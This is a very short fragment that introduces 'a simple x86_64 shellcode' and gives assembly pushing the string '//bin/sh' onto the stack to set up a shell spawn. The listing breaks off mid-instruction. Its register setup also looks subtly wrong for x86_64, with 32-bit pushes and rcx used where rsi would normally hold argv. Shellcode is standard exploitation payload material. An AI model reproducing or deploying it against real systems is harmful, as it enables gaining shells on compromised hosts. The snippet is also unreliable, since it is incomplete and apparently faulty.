A simple x86_64 shellcode is written:
BITS 64 xor rax, rax push rax push 0x68732f6e push 0x69622f2f mov rbx, rsp push rax mov rdx, rsp push rbx mov rcx, rsp m